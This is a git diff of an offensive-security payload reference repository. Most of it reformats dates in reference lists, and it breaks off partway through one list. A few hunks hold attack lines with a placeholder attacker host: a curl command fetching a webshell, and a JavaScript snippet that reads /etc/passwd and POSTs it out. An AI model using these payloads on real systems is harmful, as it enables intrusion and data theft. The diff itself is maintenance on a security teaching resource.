@@ -134,7 +134,7 @@ Sometimes, direct command execution from the injection might not be possible, bu
 
     ```ps1
     # -o, --output <file>        Write to file instead of stdout
-    curl http://evil.attacker.com/ -o webshell.php
+    curl http://[ATTACKER.DOMAIN.TLD]/ -o webshell.php
     ```
 
 ### Inside A Command
@@ -470,7 +470,7 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
 * [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://web.archive.org/web/20241202133053/https://twitter.com/DissectMalware/status/1025604382644232192)
 * [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
 * [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://web.archive.org/web/20220428000241/https://twitter.com/asdizzle_/status/895244943526170628)
-* [OS Command Injection - PortSwigger - 2024](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection)
+* [OS Command Injection - PortSwigger - March 30, 2019](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection)
 * [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://web.archive.org/web/20250108174818/https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
-* [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - kacperszurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
+* [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - Kacper Szurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
 * [WorstFit: Unveiling Hidden Transformers in Windows ANSI! - Orange Tsai - January 10, 2025](https://web.archive.org/web/20250109163006/https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/)
diff --git a/Cross-Site Request Forgery/README.md b/Cross-Site Request Forgery/README.md
index f6558ef657..8bbb5c2039 100644
--- a/Cross-Site Request Forgery/README.md	
+++ b/Cross-Site Request Forgery/README.md	
@@ -146,17 +146,17 @@ xhr.send('{"role":admin}');
 
 ## References
 
-* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://web.archive.org/web/20220926223539/https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
-* [Cross-Site Request Forgery (CSRF) - OWASP - Apr 19, 2024](https://web.archive.org/web/20120920091432/https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
+* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3, 2016](https://web.archive.org/web/20220926223539/https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
+* [Cross-Site Request Forgery (CSRF) - OWASP - April 19, 2024](https://web.archive.org/web/20120920091432/https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
 * [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton - July 26, 2015](https://web.archive.org/web/20170919181010/https://whitton.io/articles/messenger-site-wide-csrf/)
-* [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - 19 July 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
-* [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - 2014/10/09](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/)
+* [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - July 19, 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
+* [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - October 9, 2014](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/)
 * [Add tweet to collection CSRF - Vijay Kumar (indoappsec) - November 21, 2015](https://web.archive.org/web/20250519092910/https://hackerone.com/reports/100820)
 * [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd - October 16, 2015](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
-* [How I Hacked Your Beats Account? Apple Bug Bounty - @aaditya_purani - 2016/07/20](https://web.archive.org/web/20250504102847/https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
+* [How I Hacked Your Beats Account? Apple Bug Bounty - Aaditya Purani (@aaditya_purani) - July 20, 2016](https://web.archive.org/web/20250504102847/https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
 * [FORM POST JSON: JSON CSRF on POST Heartbeats API - Eugene Yakovchuk - July 2, 2017](https://web.archive.org/web/20180102010752/https://hackerone.com/reports/245346)
-* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15th, 2018](https://web.archive.org/web/20260208211335/https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
-* [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](https://web.archive.org/web/20250906213239/https://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
-* [Cross-Site Request Forgery Attack - PwnFunction - 5 Apr. 2019](https://web.archive.org/web/20251127000352/https://www.youtube.com/watch?v=eWEgUcHPle0)
-* [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://web.archive.org/web/20250727045637/https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
-* [Bypass Referer Check Logic for CSRF - hahwul - Oct 11, 2019](https://web.archive.org/web/20250719144921/https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
+* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15, 2018](https://web.archive.org/web/20260208211335/https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
+* [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - January 9, 2019](https://web.archive.org/web/20250906213239/https://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
+* [Cross-Site Request Forgery Attack - PwnFunction - April 5, 2019](https://web.archive.org/web/20251127000352/https://www.youtube.com/watch?v=eWEgUcHPle0)
+* [Wiping Out CSRF - Joe Rozner - October 17, 2017](https://web.archive.org/web/20250727045637/https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
+* [Bypass Referer Check Logic for CSRF - hahwul - October 11, 2019](https://web.archive.org/web/20250719144921/https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
diff --git a/DNS Rebinding/README.md b/DNS Rebinding/README.md
index 2e508ce647..2158731c30 100644
--- a/DNS Rebinding/README.md	
+++ b/DNS Rebinding/README.md	
@@ -93,4 +93,4 @@ localhost.example.com.            381     IN      CNAME   localhost.
 
 ## References
 
-* [How Do DNS Rebinding Attacks Work? - nccgroup - Apr 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)
+* [How Do DNS Rebinding Attacks Work? - NCC Group - April 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)
diff --git a/DOM Clobbering/README.md b/DOM Clobbering/README.md
index 67cbedf764..194a5769c8 100644
--- a/DOM Clobbering/README.md	
+++ b/DOM Clobbering/README.md	
@@ -138,8 +138,8 @@ Exploitation requires any kind of `HTML injection` in the page.
 
 ## References
 
-- [Bypassing CSP via DOM clobbering - Gareth Heyes - 05 June 2023](https://web.archive.org/web/20251114182213/https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
+- [Bypassing CSP via DOM clobbering - Gareth Heyes - June 5, 2023](https://web.archive.org/web/20251114182213/https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
 - [DOM Clobbering - HackTricks - January 27, 2023](https://web.archive.org/web/20241215205040/https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering)
 - [DOM Clobbering - PortSwigger - September 25, 2020](https://web.archive.org/web/20260218083100/https://portswigger.net/web-security/dom-based/dom-clobbering)
-- [DOM Clobbering strikes back - Gareth Heyes - 06 February 2020](https://web.archive.org/web/20200224065316/https://portswigger.net/research/dom-clobbering-strikes-back)
-- [Hijacking service workers via DOM Clobbering - Gareth Heyes - 29 November 2022](https://web.archive.org/web/20260123013910/https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
+- [DOM Clobbering strikes back - Gareth Heyes - February 6, 2020](https://web.archive.org/web/20200224065316/https://portswigger.net/research/dom-clobbering-strikes-back)
+- [Hijacking service workers via DOM Clobbering - Gareth Heyes - November 29, 2022](https://web.archive.org/web/20260123013910/https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
diff --git a/Dependency Confusion/README.md b/Dependency Confusion/README.md
index 02e2e0a55b..8150e656cf 100644
--- a/Dependency Confusion/README.md	
+++ b/Dependency Confusion/README.md	
@@ -33,7 +33,7 @@ Look for `npm`, `pip`, `gem` packages, the methodology is the same : you registe
 
 ## References
 
-* [Exploiting Dependency Confusion - Aman Sapra (0xsapra) - 2 Jul 2021](https://web.archive.org/web/20251107024922/https://0xsapra.github.io/website/Exploiting-Dependency-Confusion)
-* [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://web.archive.org/web/20210209181139/https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
-* [3 Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://web.archive.org/web/20210210121930/https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
-* [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained - 22 févr. 2021](https://web.archive.org/web/20210223060107/https://www.youtube.com/watch?v=zFHJwehpBrU)
+* [Exploiting Dependency Confusion - Aman Sapra (0xsapra) - July 2, 2021](https://web.archive.org/web/20251107024922/https://0xsapra.github.io/website/Exploiting-Dependency-Confusion)
+* [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - February 9, 2021](https://web.archive.org/web/20210209181139/https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
+* [3 Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - March 29, 2021](https://web.archive.org/web/20210210121930/https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
+* [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained - February 22, 2021](https://web.archive.org/web/20210223060107/https://www.youtube.com/watch?v=zFHJwehpBrU)
diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
index ed3d49fcc0..d7b02b6b42 100644
--- a/Directory Traversal/README.md	
+++ b/Directory Traversal/README.md	
@@ -347,9 +347,9 @@ c:/windows/repair/system
 * [Cookieless ASPNET - Soroush Dalili - March 27, 2023](https://web.archive.org/web/20241202163755/https://twitter.com/irsdl/status/1640390106312835072)
 * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://web.archive.org/web/20080115180212/http://cwe.mitre.org:80/data/definitions/40.html)
 * [Directory traversal - Portswigger - March 30, 2019](https://web.archive.org/web/20190330191447/https://portswigger.net/web-security/file-path-traversal)
-* [Directory traversal attack - Wikipedia - August 5,  2024](https://web.archive.org/web/20111013162219/http://en.wikipedia.org:80/wiki/Directory_traversal_attack)
+* [Directory traversal attack - Wikipedia - August 5, 2024](https://web.archive.org/web/20111013162219/http://en.wikipedia.org:80/wiki/Directory_traversal_attack)
 * [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://web.archive.org/web/20240323234120/https://youtu.be/YlZGJ28By8U)
-* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - 19 June 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
+* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - June 19, 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
 * [NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
 * [Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015](https://web.archive.org/web/20170123115404/https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
 * [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - June 24, 2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))
diff --git a/File Inclusion/LFI-to-RCE.md b/File Inclusion/LFI-to-RCE.md
index 39cadbc4ec..51817eb85f 100644
--- a/File Inclusion/LFI-to-RCE.md	
+++ b/File Inclusion/LFI-to-RCE.md	
@@ -295,9 +295,9 @@ If SSH is active, check which user is being used in the machine by including the
 
 ## References
 
-- [LFI WITH PHPINFO() ASSISTANCE - Brett Moore - September 2011](https://web.archive.org/web/20170406225317/https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf)
+- [LFI WITH PHPINFO() ASSISTANCE - Brett Moore - April 6, 2017](https://web.archive.org/web/20170406225317/https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf)
 - [LFI2RCE via PHP Filters - HackTricks - July 19, 2024](https://web.archive.org/web/20220819000915/https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
 - [Local file inclusion tricks - Johan Adriaans - August 4, 2007](https://web.archive.org/web/20250403080651/http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
 - [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - Gynvael Coldwind - March 18, 2011](https://web.archive.org/web/20110429042455/http://gynvael.coldwind.pl:80/?id=376)
-- [PHP LFI with Nginx Assistance - Bruno Bierbaumer - 26 Dec 2021](https://web.archive.org/web/20250604035904/https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
+- [PHP LFI with Nginx Assistance - Bruno Bierbaumer - December 26, 2021](https://web.archive.org/web/20250604035904/https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 - [Upgrade from LFI to RCE via PHP Sessions - Reiners - September 14, 2017](https://web.archive.org/web/20170914211708/https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 0defb0f14e..bbf4af609a 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -137,9 +137,9 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
 
 ## References
 
-- [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
-- [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
-- [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
-- [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/)
-- [Testing for Local File Inclusion - OWASP - 25 June 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
-- [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)
+- [CVV #1: Local File Inclusion - SI9INT - June 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
+- [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - May 12, 2019](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
+- [Is PHP vulnerable and under what conditions? - Andreas Venieris - April 13, 2015](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
+- [LFI Cheat Sheet - @Arr0way - April 24, 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/)
+- [Testing for Local File Inclusion - OWASP - June 25, 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
+- [Turning LFI into RFI - Grayson Christopher - August 14, 2017](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)
diff --git a/File Inclusion/Wrappers.md b/File Inclusion/Wrappers.md
index 48f63ee80f..c35841d450 100644
--- a/File Inclusion/Wrappers.md	
+++ b/File Inclusion/Wrappers.md	
@@ -263,7 +263,7 @@ code remote.py # edit Remote.oracle
 
 ## References
 
-- [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - Dec 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
+- [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - December 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
 - [Iconv, set the charset to RCE: exploiting the libc to hack the php engine (part 1) - Charles Fol - May 27, 2024](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)
 - [Introducing lightyear: a new way to dump PHP files - Charles Fol - November 4, 2024](https://web.archive.org/web/20250809094219/https://www.ambionics.io/blog/lightyear-file-dump)
 - [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - December 11, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
@@ -272,4 +272,4 @@ code remote.py # edit Remote.oracle
 - [OffensiveCon24 - Charles Fol- Iconv, Set the Charset to RCE - June 14, 2024](https://youtu.be/dqKFHjcK9hM)
 - [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - March 21, 2023](https://web.archive.org/web/20260228090126/https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
 - [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - October 18, 2022](https://web.archive.org/web/20260212042712/https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
-- [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
+- [Solving "includer's revenge" from hxp CTF 2021 without controlling any files - @loknop - December 30, 2021](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 31e442af73..378407f664 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -479,17 +479,17 @@ query {
 - [Exploiting GraphQL - AssetNote - Shubham Shah - August 29, 2021](https://web.archive.org/web/20210830161635/https://blog.assetnote.io/2021/08/29/exploiting-graphql/)
 - [GraphQL Batching Attack - Wallarm - December 13, 2019](https://web.archive.org/web/20260223043402/https://lab.wallarm.com/graphql-batching-attack/)
 - [GraphQL for Pentesters presentation - Alexandre ZANNI (@noraj) - December 1, 2022](https://web.archive.org/web/20230205233412/https://acceis.github.io/prez-graphql/)
-- [API Hacking GraphQL - @ghostlulz - Jun 8, 2019](https://web.archive.org/web/20190619040847/https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
-- [Discovering GraphQL endpoints and SQLi vulnerabilities - Matías Choren - Sep 23, 2018](https://web.archive.org/web/20180923085151/https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
+- [API Hacking GraphQL - @ghostlulz - June 8, 2019](https://web.archive.org/web/20190619040847/https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
+- [Discovering GraphQL endpoints and SQLi vulnerabilities - Matías Choren - September 23, 2018](https://web.archive.org/web/20180923085151/https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
 - [GraphQL abuse: Bypass account level permissions through parameter smuggling - Jon Bottarini - March 14, 2018](https://web.archive.org/web/20231027032512/https://labs.detectify.com/2018/03/14/graphql-abuse/)
-- [Graphql Bug to Steal Anyone's Address - Pratik Yadav - Sept 1, 2019](https://web.archive.org/web/20250514221822/https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
+- [Graphql Bug to Steal Anyone's Address - Pratik Yadav - September 1, 2019](https://web.archive.org/web/20250514221822/https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
 - [GraphQL cheatsheet - devhints.io - November 7, 2018](https://web.archive.org/web/20181107093033/https://devhints.io/graphql)
 - [GraphQL Introspection - GraphQL - August 21, 2024](https://web.archive.org/web/20260302160506/https://graphql.org/learn/introspection/)
 - [GraphQL NoSQL Injection Through JSON Types - Pete Corey - June 12, 2017](https://web.archive.org/web/20250514221852/https://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
 - [HIP19 Writeup - Meet Your Doctor 1,2,3 - Swissky - June 22, 2019](https://web.archive.org/web/20190825033521/https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
-- [How to set up a GraphQL Server using Node.js, Express & MongoDB - Leonardo Maldonado - 5 November 2018](https://web.archive.org/web/20190718023950/https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
+- [How to set up a GraphQL Server using Node.js, Express & MongoDB - Leonardo Maldonado - November 5, 2018](https://web.archive.org/web/20190718023950/https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
 - [Introduction to GraphQL - GraphQL - November 1, 2024](https://web.archive.org/web/20160917011216/http://graphql.org:80/learn)
 - [Introspection query leaks sensitive graphql system information - @Zuriel - November 18, 2017](https://web.archive.org/web/20250710175416/https://hackerone.com/reports/291531)
-- [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r - 8 June 2017](https://web.archive.org/web/20170608142208/https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
-- [Securing Your GraphQL API from Malicious Queries - Max Stoiber - Feb 21, 2018](https://web.archive.org/web/20180731231915/https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
-- [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Jobert Abma (jobert) - Nov 6th 2018](https://web.archive.org/web/20181203004543/https://hackerone.com/reports/435066)
+- [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r - June 8, 2017](https://web.archive.org/web/20170608142208/https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
+- [Securing Your GraphQL API from Malicious Queries - Max Stoiber - February 21, 2018](https://web.archive.org/web/20180731231915/https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
+- [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Jobert Abma (jobert) - November 6, 2018](https://web.archive.org/web/20181203004543/https://hackerone.com/reports/435066)
diff --git a/Headless Browser/README.md b/Headless Browser/README.md
index b870500f85..3d7c688827 100644
--- a/Headless Browser/README.md	
+++ b/Headless Browser/README.md	
@@ -53,7 +53,7 @@ Since the file access is allowed, an atacker can create and expose an HTML file
   async function getFlag(){
     response = await fetch("file:///etc/passwd");
     flag = await response.text();
-    fetch("https://attacker.com/", { method: "POST", body: flag})
+  fetch("https://[ATTACKER.DOMAIN.TLD]/", { method: "POST", body: flag})
   };
   getFlag();
 </script>
@@ -106,7 +106,7 @@ The Remote Debugging Port in a headless browser (like Headless Chrome or Chromiu
 * Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices`
 * Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs
 * Data stored in the settings (username, passwords, token): `chrome://settings`
-* Port Scan: In a loop open `http://localhost:<port>/json/new?http://callback.example.com?port=<port>`
+* Port Scan: In a loop open `http://localhost:<port>/json/new?http://[ATTACKER.DOMAIN.TLD]/?port=<port>`
 * Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version`
 
     ```json
diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md
index fded3a0555..37e0c362d3 100644
--- a/Insecure Deserialization/Java.md	
+++ b/Insecure Deserialization/Java.md	
@@ -302,7 +302,7 @@ Common secrets from the [documentation](https://cwiki.apache.org/confluence/disp
 * [Hack The Box - Arkham - 0xRick - August 10, 2019](https://web.archive.org/web/20251125134359/https://0xrick.github.io/hack-the-box/arkham/)
 * [How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018](https://web.archive.org/web/20250918030712/https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
 * [Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
-* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - 22 Jul 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
+* [Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni - July 22, 2019](https://web.archive.org/web/20190724143322/https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
 * [Jackson Polymorphic Deserialization - FasterXML - July 23, 2020](https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization)
 * [Java Deserialization Cheat Sheet - Aleksei Tiurin - May 23, 2023](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 * [Java Deserialization in ViewState - Haboob Team - December 23, 2020](https://web.archive.org/web/20250909154616/https://www.exploit-db.com/docs/48126)
diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md
index 79f49401bc..732f0ec26e 100644
--- a/Insecure Deserialization/Python.md	
+++ b/Insecure Deserialization/Python.md	
@@ -133,4 +133,4 @@ with open('exploit_unsafeloader.yml') as file:
 * [Python Yaml Deserialization - HackTricks - July 19, 2024](https://web.archive.org/web/20241216145404/https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)
 * [PyYAML Documentation - PyYAML - April 29, 2006](https://web.archive.org/web/20260219140302/https://pyyaml.org/wiki/PyYAMLDocumentation)
 * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://web.archive.org/web/20250604032318/https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
-* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md
index 83cf554d64..1e42704960 100644
--- a/Insecure Deserialization/Ruby.md	
+++ b/Insecure Deserialization/Ruby.md	
@@ -89,6 +89,6 @@ Universal gadget for ruby 2.x - 3.x.
 
 * [Ruby 2.X Universal RCE Deserialization Gadget Chain - Luke Jahnke - November 8, 2018](https://web.archive.org/web/20191128020715/https://www.elttam.com.au/blog/ruby-deserialization/)
 * [Universal RCE with Ruby YAML.load - Etienne Stalmans (@_staaldraad) - March 2, 2019](https://web.archive.org/web/20190302114631/https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
-* [Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab - 2024](https://web.archive.org/web/20190817140453/https://pentesterlab.com/exercises/ruby_ugadget/course)
+* [Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab - August 17, 2019](https://web.archive.org/web/20190817140453/https://pentesterlab.com/exercises/ruby_ugadget/course)
 * [Universal RCE with Ruby YAML.load (versions > 2.7) - Etienne Stalmans (@_staaldraad) - January 9, 2021](https://web.archive.org/web/20260201150417/https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
 * [Blind Remote Code Execution through YAML Deserialization - Colin McQueen - June 9, 2021](https://web.archive.org/web/20210610111705/https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
diff --git a/Insecure Management Interface/README.md b/Insecure Management Interface/README.md
index 6312a6a700..753be86f08 100644
--- a/Insecure Management Interface/README.md	
+++ b/Insecure Management Interface/README.md	
@@ -38,5 +38,5 @@ Insecure Management Interface vulnerabilities arise when administrative interfac
 ## References
 
 * [CAPEC-121: Exploit Non-Production Interfaces - CAPEC - July 30, 2020](https://web.archive.org/web/20260116113320/https://capec.mitre.org/data/definitions/121.html)
-* [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://web.archive.org/web/20250116045001/https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
